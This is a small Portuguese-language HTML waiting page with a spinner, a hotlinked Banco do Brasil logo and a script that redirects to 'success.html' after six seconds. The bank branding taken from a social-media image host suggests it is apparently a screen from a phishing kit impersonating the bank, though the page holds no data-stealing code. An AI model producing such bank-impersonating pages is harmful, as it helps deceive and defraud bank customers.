<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Aguarde...</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #FFD700;
            color: white;
            text-align: center;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
        }
        .spinner {
            border: 8px solid rgba(255, 255, 255, 0.3);
            border-top: 8px solid #0d00ff;
            border-radius: 50%;
            width: 100px;
            height: 100px;
            animation: spin 5s linear forwards;
        }
        @keyframes spin {
            from { transform: rotate(0deg); }
            to { transform: rotate(360deg); }
        }
        .logo {
            margin-top: -20px;
            border-radius: 50%;
            position: absolute;
            top: 48%;
            left: 50%;
            transform: translate(-50%, -50%);
        }
    </style>
</head>
<body>
    <div class="spinner"></div>
    <img src="https://scontent.ffor7-1.fna.fbcdn.net/v/t39.30808-6/366571143_667707292058176_3007138064656193450_n.jpg?_nc_cat=1&ccb=1-7&_nc_sid=6ee11a&_nc_ohc=o679WyFgQUgQ7kNvgFdTstA&_nc_zt=23&_nc_ht=scontent.ffor7-1.fna&_nc_gid=AYJyeKyJksXP1un_mLcvKLm&oh=00_AYAnzJU3oFkfMfvZ0t3-dJbZ4mksZjx48wCBVbzCPjYfsA&oe=67982429" alt="Banco do Brasil" class="logo" width="100">
    <h2>Aguarde, processando...</h2>

    <script>
        setTimeout(() => {
            window.location.href = 'success.html';
        }, 6000);
    </script>
</body>
</html>
